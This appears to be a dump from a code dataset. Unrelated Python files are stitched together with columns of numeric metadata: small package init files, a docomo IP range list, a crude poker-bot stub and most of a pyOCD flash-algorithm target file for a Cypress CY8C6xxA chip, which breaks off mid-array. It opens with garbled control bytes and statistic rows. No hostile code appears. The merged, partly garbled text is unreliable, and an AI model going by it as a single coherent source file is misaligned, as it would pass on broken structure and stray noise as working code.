\x01\x13\x01\n\x01\n\x01\r\x01\x05\x01\x0e\x02\x0c\x15\t\x0f\t\x06\t\x16\t?\t(\t\x16\t\x1c\t\x0c\t\r\t\x0b\t\x14\t\x0f\x19\x18\t\x06\t\t\t\x1c\t\x0e\t"\t\x1f\t 
\t\x0f\tP\t&\to\t\x15\t\n\t\t\t\\\t(\t#\t\x19\tA\tb\tO\t)\t(\x07\x01\x05\x01\x15\x01\r\x01\r\x01\x15\x01\r\x01\r\x01\x15\x01\r\x01\x05\x01'''))
| 51,722.5
| 103,430
| 0.719677
| 22,670
| 103,445
| 3.253727
| 0.050904
| 0.248014
| 0.118598
| 0.063122
| 0.773474
| 0.715707
| 0.641726
| 0.577967
| 0.546162
| 0.507917
| 0
| 0.378925
| 0.02903
| 103,445
| 2
| 103,430
| 51,722.5
| 0.355449
| 0
| 0
| 0
| 0
| 0.5
| 0.999584
| 0.729018
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 13
|
1684c76c54fd838fa0beefe73832135730351c30
| 321
|
py
|
Python
|
src/pylogctx/__init__.py
|
bradykieffer/pylogctx
|
1ae9e2dfd27104f3c39e72161a8ee638130ac99a
|
[
"BSD-2-Clause"
] | 18
|
2017-12-19T10:14:51.000Z
|
2020-06-11T11:43:41.000Z
|
src/pylogctx/__init__.py
|
bradykieffer/pylogctx
|
1ae9e2dfd27104f3c39e72161a8ee638130ac99a
|
[
"BSD-2-Clause"
] | 25
|
2017-12-12T17:10:37.000Z
|
2021-06-11T18:33:38.000Z
|
src/pylogctx/__init__.py
|
bradykieffer/pylogctx
|
1ae9e2dfd27104f3c39e72161a8ee638130ac99a
|
[
"BSD-2-Clause"
] | 7
|
2017-12-21T10:52:26.000Z
|
2021-06-11T18:17:32.000Z
|
from .core import (
AdapterNotFound,
AddContextFilter,
AddContextFormatter,
ExcInfoFilter,
LazyAccessor,
context,
log_adapter,
)
__all__ = [
'AdapterNotFound',
'AddContextFilter',
'AddContextFormatter',
'ExcInfoFilter',
'LazyAccessor',
'context',
'log_adapter',
]
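The export list above defines pylogctx's public names. The sketch below is not the library's implementation; it is a minimal, stdlib-only illustration of the pattern the AddContextFilter name suggests (a logging.Filter that copies a shared context mapping onto every LogRecord). The names ctx and ContextFilter are hypothetical and introduced only for this example.
import logging

ctx = {}  # hypothetical stand-in for a shared, request-scoped context

class ContextFilter(logging.Filter):
    def filter(self, record):
        # Copy each context key onto the record so formatters can reference it.
        for key, value in ctx.items():
            setattr(record, key, value)
        return True

logging.basicConfig(format="%(levelname)s %(request_id)s %(message)s")
log = logging.getLogger("demo")
log.addFilter(ContextFilter())

ctx["request_id"] = "req-42"
log.warning("payment failed")  # prints: WARNING req-42 payment failed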
| 16.05
| 26
| 0.64486
| 20
| 321
| 10.05
| 0.6
| 0.308458
| 0.497512
| 0.626866
| 0.915423
| 0.915423
| 0.915423
| 0.915423
| 0
| 0
| 0
| 0
| 0.249221
| 321
| 19
| 27
| 16.894737
| 0.834025
| 0
| 0
| 0
| 0
| 0
| 0.28972
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.055556
| 0
| 0.055556
| 0
| 1
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
16abc1dbd76e44fb27d3ec1d724a6acc4aaae1c3
| 112
|
py
|
Python
|
src/__init__.py
|
fabyanMikhael/PIL-Stacks
|
65063e02a6d156a9f1b1370d57296c63699bd408
|
[
"MIT"
] | 2
|
2021-07-18T22:40:42.000Z
|
2021-07-19T23:11:58.000Z
|
src/__init__.py
|
fabyanMikhael/PIL-Stacks
|
65063e02a6d156a9f1b1370d57296c63699bd408
|
[
"MIT"
] | 3
|
2021-05-23T07:30:28.000Z
|
2021-05-26T02:06:21.000Z
|
src/__init__.py
|
fabyanMikhael/PIL-Stacks
|
65063e02a6d156a9f1b1370d57296c63699bd408
|
[
"MIT"
] | 3
|
2021-05-23T03:50:10.000Z
|
2021-05-23T03:59:30.000Z
|
from src.pil_stacks.Editor import *
from src.pil_stacks.Layers import *
from src.pil_stacks.PIL_Stacks import *
| 28
| 39
| 0.8125
| 19
| 112
| 4.578947
| 0.368421
| 0.413793
| 0.344828
| 0.551724
| 0.505747
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.107143
| 112
| 3
| 40
| 37.333333
| 0.87
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
16c87b5e141afb9de11310a42f1032fc35cfcaa7
| 181
|
py
|
Python
|
uamobile/cidrdata/docomo.py
|
east301/wsgiuseragentmobile-python3
|
ae005c706006144d81e73b893e29f64c0a3101e9
|
[
"MIT"
] | null | null | null |
uamobile/cidrdata/docomo.py
|
east301/wsgiuseragentmobile-python3
|
ae005c706006144d81e73b893e29f64c0a3101e9
|
[
"MIT"
] | null | null | null |
uamobile/cidrdata/docomo.py
|
east301/wsgiuseragentmobile-python3
|
ae005c706006144d81e73b893e29f64c0a3101e9
|
[
"MIT"
] | null | null | null |
DATA = [ '210.153.84.0/24',
'210.136.161.0/24',
'210.153.86.0/24',
'124.146.174.0/24',
'124.146.175.0/24',
'202.229.176.0/24',
'202.229.177.0/24',
'202.229.178.0/24']
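The DATA constant above is a plain list of CIDR strings. The stdlib-only sketch below shows one common way such a list is consumed, testing whether a client IP falls inside any of the ranges; the is_docomo_ip helper is hypothetical and not part of the wsgiuseragentmobile package.
import ipaddress

CIDRS = ['210.153.84.0/24', '210.136.161.0/24', '202.229.176.0/24']  # subset of DATA above
NETWORKS = [ipaddress.ip_network(cidr) for cidr in CIDRS]

def is_docomo_ip(addr):
    # True if addr falls inside any configured CIDR block.
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in NETWORKS)

print(is_docomo_ip('210.153.84.17'))  # True
print(is_docomo_ip('192.0.2.1'))      # False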
| 20.111111
| 27
| 0.541436
| 41
| 181
| 2.390244
| 0.439024
| 0.244898
| 0.183673
| 0.27551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.602564
| 0.138122
| 181
| 8
| 28
| 22.625
| 0.025641
| 0
| 0
| 0
| 0
| 0
| 0.696133
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16ce8312bb8fe9c9bc4bdbb458b86e2b724a45af
| 162
|
py
|
Python
|
abfahrt/testutils/test_generator/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | 1
|
2022-01-30T14:30:02.000Z
|
2022-01-30T14:30:02.000Z
|
abfahrt/testutils/test_generator/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
abfahrt/testutils/test_generator/__init__.py
|
Team-Zugig-zum-Erfolg/InformatiCup
|
788076ac38bf6d8f462465b7fb96db14d13bed30
|
[
"MIT"
] | null | null | null |
"""
This is the module test_generator for automatic testing/validating randomly generated input
"""
from abfahrt.testutils.test_generator import test_generator
| 32.4
| 93
| 0.814815
| 21
| 162
| 6.142857
| 0.809524
| 0.302326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12963
| 162
| 4
| 94
| 40.5
| 0.914894
| 0.549383
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
16d84b193b051a338115297d671ff95d2ffad501
| 33
|
py
|
Python
|
SSD/SSD_FPN_GIoU/model/__init__.py
|
ForrestPi/ObjectDetection
|
54e0821e73f67be5360c36f01229a123c34ab3b3
|
[
"MIT"
] | 12
|
2020-03-25T01:24:22.000Z
|
2021-09-18T06:40:16.000Z
|
model_ssd/__init__.py
|
Yang-Zhaowei/PowerBank
|
0d6766038bd3ee37036e4255713d5c06e81a83ed
|
[
"MIT"
] | 1
|
2020-04-22T07:52:36.000Z
|
2020-04-22T07:52:36.000Z
|
model_ssd/__init__.py
|
Yang-Zhaowei/PowerBank
|
0d6766038bd3ee37036e4255713d5c06e81a83ed
|
[
"MIT"
] | 4
|
2020-03-25T01:24:26.000Z
|
2020-09-20T11:29:09.000Z
|
from .build_ssd import build_ssd
| 16.5
| 32
| 0.848485
| 6
| 33
| 4.333333
| 0.666667
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bc87e0641f19b204da0ff231a8fc8709ac1fe854
| 148
|
py
|
Python
|
player.py
|
martaJesztak/poker-player-texas-rangers
|
32a1efc19ebea01e8bbabf95d4828ae419bcba95
|
[
"MIT"
] | null | null | null |
player.py
|
martaJesztak/poker-player-texas-rangers
|
32a1efc19ebea01e8bbabf95d4828ae419bcba95
|
[
"MIT"
] | null | null | null |
player.py
|
martaJesztak/poker-player-texas-rangers
|
32a1efc19ebea01e8bbabf95d4828ae419bcba95
|
[
"MIT"
] | null | null | null |
class Player:
VERSION = "fuck"
def betRequest(self, game_state):
return 10000000
def showdown(self, game_state):
pass
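Player above is a callback class that a poker engine drives. The short driver below is hypothetical; the shape of game_state is an assumption for illustration and is not taken from the repository.
# Hypothetical driver for the Player class defined above.
player = Player()
game_state = {'players': [], 'community_cards': [], 'current_buy_in': 200}  # assumed shape
print(player.betRequest(game_state))  # 10000000
player.showdown(game_state)           # no-op in this implementation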
| 16.444444
| 37
| 0.621622
| 17
| 148
| 5.294118
| 0.764706
| 0.177778
| 0.288889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0.297297
| 148
| 8
| 38
| 18.5
| 0.788462
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
|
0
| 7
|
bc8c53670087794a343bd2008386076c0630fa45
| 34,684
|
py
|
Python
|
pyocd/target/builtin/target_CY8C6xxA.py
|
jeromecoutant/pyOCD
|
304dfa804231dbe1ea9a9a2d5d7c44eaf9531de1
|
[
"Apache-2.0"
] | null | null | null |
pyocd/target/builtin/target_CY8C6xxA.py
|
jeromecoutant/pyOCD
|
304dfa804231dbe1ea9a9a2d5d7c44eaf9531de1
|
[
"Apache-2.0"
] | null | null | null |
pyocd/target/builtin/target_CY8C6xxA.py
|
jeromecoutant/pyOCD
|
304dfa804231dbe1ea9a9a2d5d7c44eaf9531de1
|
[
"Apache-2.0"
] | null | null | null |
# pyOCD debugger
# Copyright (c) 2006-2013 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from time import (time, sleep)
from ...core import exceptions
from ...core.coresight_target import CoreSightTarget
from ...core.memory_map import (FlashRegion, RamRegion, RomRegion, MemoryMap)
from ...core.target import Target
from ...coresight.cortex_m import CortexM
from ...flash.flash import Flash
from ...utility.notification import Notification
from ...utility.timeout import Timeout
flash_algo_main = {
'load_address': 0x08000000,
# Flash algorithm as a hex string
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x20004603, 0x46014770, 0x47702000, 0xf000b510, 0xbd10f972, 0x4604b510, 0xf0004620, 0xbd10f915,
0x4606b570, 0x4615460c, 0x46294622, 0xf0004630, 0xbd70f969, 0x4604b570, 0x4616460d, 0x46294632,
0xf0004620, 0xbd70f81f, 0x47706001, 0x600a6802, 0x21004770, 0x1c49e000, 0x43424ad6, 0xd8fa428a,
0xb5084770, 0x48d44669, 0xfff0f7ff, 0x0209210f, 0x40089800, 0xd1012800, 0xe0002001, 0x46032000,
0xbd084618, 0x4603b570, 0x461d460c, 0xe0052100, 0x5c6e5c50, 0xd00042b0, 0x1c49e002, 0xd3f742a1,
0x1858bf00, 0xb5febd70, 0x460b4605, 0x20004616, 0x24009002, 0x01682700, 0x184049c0, 0xbf009000,
0x9800a901, 0xf7ff301c, 0x9801ffc1, 0x2b000fc7, 0x2f00d001, 0x2b00d103, 0x2f00d103, 0x2001d101,
0x2000e000, 0x2c004604, 0x9802d109, 0xd90042b0, 0x2001e007, 0xffadf7ff, 0x1c409802, 0x2c009002,
0xbf00d0de, 0x21014620, 0xbdfe4048, 0x4604b5f8, 0x2600460d, 0x01602300, 0x184749a8, 0x4669bf00,
0xf7ff4638, 0x9800ff93, 0x2b000fc3, 0x42aed106, 0xe005d900, 0xf7ff2001, 0x1c76ff8c, 0xd0ee2b00,
0x4618bf00, 0x40482101, 0xb5f0bdf8, 0x460d4607, 0x26004613, 0xbf002400, 0x46384619, 0xff76f7ff,
0x0f006818, 0x21050700, 0x42880749, 0x2001d101, 0x2000e000, 0x2c004604, 0x42aed106, 0xe005d900,
0xf7ff2001, 0x1c76ff66, 0xd0e52c00, 0x4620bf00, 0x40482101, 0xb5f3bdf0, 0x4606b082, 0x48882700,
0x90014478, 0x0fc007f0, 0x40482101, 0x25009000, 0xff57f7ff, 0xd0022800, 0x4d802400, 0x2401e002,
0x35204d7e, 0x31f521ff, 0xf7ff4620, 0x4607ff9f, 0xd1362f00, 0x28009800, 0x4628d005, 0x9901300c,
0xff32f7ff, 0x4631e004, 0x300c4628, 0xff2cf7ff, 0x30104620, 0x40822201, 0x48724611, 0xff24f7ff,
0x46282101, 0xf7ff3008, 0x22ffff1f, 0x210032f5, 0xf7ff4620, 0x4607ff48, 0xd1122f00, 0x28009800,
0x21ffd007, 0x9a0331f5, 0xf7ff9801, 0x4607ff8e, 0x21ffe007, 0x462831f5, 0x9a03300c, 0xff85f7ff,
0x46384607, 0xbdf0b004, 0x4604b538, 0x447d4d5c, 0x495d3dae, 0xf7ff4628, 0x4621fef7, 0xf7ff1d28,
0x4669fef3, 0xf7ff4858, 0xbd38ff96, 0x4604b538, 0x447d4d53, 0x49553dd2, 0xf7ff4628, 0x4621fee5,
0xf7ff1d28, 0x4669fee1, 0xf7ff4850, 0xbd38ff84, 0x4604b538, 0x447d4d4a, 0x494c3df6, 0xf7ff4628,
0x4621fed3, 0xf7ff1d28, 0x4669fecf, 0xf7ff4847, 0xbd38ff72, 0x4c46b518, 0x4946447c, 0xf7ff4620,
0x4669fec3, 0xf7ff4843, 0xbd18ff66, 0x4606b570, 0x2500460c, 0x4630e00a, 0xffb6f7ff, 0x2d004605,
0xe005d000, 0x36ff36ff, 0x1e643602, 0xd1f22c00, 0x4628bf00, 0xb510bd70, 0xf7ff2400, 0x4604ffdb,
0xbd104620, 0x4605b5f8, 0x4617460e, 0x447c4c30, 0x49313c56, 0xf7ff4620, 0x21fffe97, 0x1d203107,
0xfe92f7ff, 0x46204629, 0xf7ff3008, 0x4631fe8d, 0x300c4620, 0xfe88f7ff, 0x48274669, 0xff2bf7ff,
0xb5f8bdf8, 0x460e4605, 0x4c214617, 0x3c94447c, 0x46204922, 0xfe78f7ff, 0x310721ff, 0xf7ff1d20,
0x4629fe73, 0x30084620, 0xfe6ef7ff, 0x46204631, 0xf7ff300c, 0x4669fe69, 0xf7ff4818, 0xbdf8ff0c,
0xb0ffb570, 0x4605b081, 0x24002600, 0x2000e003, 0x55084669, 0x20011c64, 0x42840240, 0x4602dbf7,
0x46284669, 0xffcdf7ff, 0x46304606, 0xb001b07f, 0x0000bd70, 0x00000d05, 0x40200000, 0x40220000,
0x0000023c, 0x40221008, 0x1c000100, 0x14000100, 0x00000124, 0x0a000100, 0x06000100, 0x05000100,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000
],
# Relative function addresses
'pc_init': 0x08000021,
'pc_unInit': 0x08000027,
'pc_program_page': 0x08000041,
'pc_erase_sector': 0x08000035,
'pc_eraseAll': 0x0800002d,
'static_base': 0x08000000 + 0x00000020 + 0x000009f4,
'begin_stack': 0x08000d00,
'begin_data': 0x08000000 + 0x1000,
'page_size': 0x200,
'analyzer_supported': False,
'analyzer_address': 0x00000000,
'page_buffers': [0x08001000, 0x08001200], # Enable double buffering
'min_program_length': 0x200,
# Flash information
'flash_start': 0x10000000,
'flash_size': 0x200000,
'sector_sizes': (
(0x0, 0x200),
)
}
flash_algo_work = {
'load_address': 0x08000000,
# Flash algorithm as a hex string
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x20004603, 0x46014770, 0x47702000, 0xf000b510, 0xbd10f972, 0x4604b510, 0xf0004620, 0xbd10f915,
0x4606b570, 0x4615460c, 0x46294622, 0xf0004630, 0xbd70f96c, 0x4604b570, 0x4616460d, 0x46294632,
0xf0004620, 0xbd70f81f, 0x47706001, 0x600a6802, 0x21004770, 0x1c49e000, 0x43424ad7, 0xd8fa428a,
0xb5084770, 0x48d54669, 0xfff0f7ff, 0x0209210f, 0x40089800, 0xd1012800, 0xe0002001, 0x46032000,
0xbd084618, 0x4603b570, 0x461d460c, 0xe0052100, 0x5c6e5c50, 0xd00042b0, 0x1c49e002, 0xd3f742a1,
0x1858bf00, 0xb5febd70, 0x460b4605, 0x20004616, 0x24009002, 0x01682700, 0x184049c1, 0xbf009000,
0x9800a901, 0xf7ff301c, 0x9801ffc1, 0x2b000fc7, 0x2f00d001, 0x2b00d103, 0x2f00d103, 0x2001d101,
0x2000e000, 0x2c004604, 0x9802d109, 0xd90042b0, 0x2001e007, 0xffadf7ff, 0x1c409802, 0x2c009002,
0xbf00d0de, 0x21014620, 0xbdfe4048, 0x4604b5f8, 0x2600460d, 0x01602300, 0x184749a9, 0x4669bf00,
0xf7ff4638, 0x9800ff93, 0x2b000fc3, 0x42aed106, 0xe005d900, 0xf7ff2001, 0x1c76ff8c, 0xd0ee2b00,
0x4618bf00, 0x40482101, 0xb5f0bdf8, 0x460d4607, 0x26004613, 0xbf002400, 0x46384619, 0xff76f7ff,
0x0f006818, 0x21050700, 0x42880749, 0x2001d101, 0x2000e000, 0x2c004604, 0x42aed106, 0xe005d900,
0xf7ff2001, 0x1c76ff66, 0xd0e52c00, 0x4620bf00, 0x40482101, 0xb5f3bdf0, 0x4606b082, 0x48892700,
0x90014478, 0x0fc007f0, 0x40482101, 0x25009000, 0xff57f7ff, 0xd0022800, 0x4d812400, 0x2401e002,
0x35204d7f, 0x31f521ff, 0xf7ff4620, 0x4607ff9f, 0xd1362f00, 0x28009800, 0x4628d005, 0x9901300c,
0xff32f7ff, 0x4631e004, 0x300c4628, 0xff2cf7ff, 0x30104620, 0x40822201, 0x48734611, 0xff24f7ff,
0x46282101, 0xf7ff3008, 0x22ffff1f, 0x210032f5, 0xf7ff4620, 0x4607ff48, 0xd1122f00, 0x28009800,
0x21ffd007, 0x9a0331f5, 0xf7ff9801, 0x4607ff8e, 0x21ffe007, 0x462831f5, 0x9a03300c, 0xff85f7ff,
0x46384607, 0xbdf0b004, 0x4604b538, 0x447d4d5d, 0x495e3dae, 0xf7ff4628, 0x4621fef7, 0xf7ff1d28,
0x4669fef3, 0xf7ff4859, 0xbd38ff96, 0x4604b538, 0x447d4d54, 0x49563dd2, 0xf7ff4628, 0x4621fee5,
0xf7ff1d28, 0x4669fee1, 0xf7ff4851, 0xbd38ff84, 0x4604b538, 0x447d4d4b, 0x494d3df6, 0xf7ff4628,
0x4621fed3, 0xf7ff1d28, 0x4669fecf, 0xf7ff4848, 0xbd38ff72, 0x4c47b518, 0x4947447c, 0xf7ff4620,
0x4669fec3, 0xf7ff4844, 0xbd18ff66, 0x4606b570, 0x2500460c, 0x4630e00a, 0xffb6f7ff, 0x2d004605,
0xe005d000, 0x36ff36ff, 0x1e643602, 0xd1f22c00, 0x4628bf00, 0xb510bd70, 0x21402400, 0x06802005,
0xffe4f7ff, 0x46204604, 0xb5f8bd10, 0x460e4605, 0x4c304617, 0x3c5c447c, 0x46204930, 0xfe94f7ff,
0x310721ff, 0xf7ff1d20, 0x4629fe8f, 0x30084620, 0xfe8af7ff, 0x46204631, 0xf7ff300c, 0x4669fe85,
0xf7ff4826, 0xbdf8ff28, 0x4605b5f8, 0x4617460e, 0x447c4c20, 0x49223c9a, 0xf7ff4620, 0x21fffe75,
0x1d203107, 0xfe70f7ff, 0x46204629, 0xf7ff3008, 0x4631fe6b, 0x300c4620, 0xfe66f7ff, 0x48184669,
0xff09f7ff, 0xb570bdf8, 0xb081b0ff, 0x26004605, 0xe0032400, 0x46692000, 0x1c645508, 0x02402001,
0xdbf74284, 0x46694602, 0xf7ff4628, 0x4606ffcd, 0xb07f4630, 0xbd70b001, 0x00000d05, 0x40200000,
0x40220000, 0x00000240, 0x40221008, 0x1c000100, 0x14000100, 0x00000128, 0x0a000100, 0x06000100,
0x05000100, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
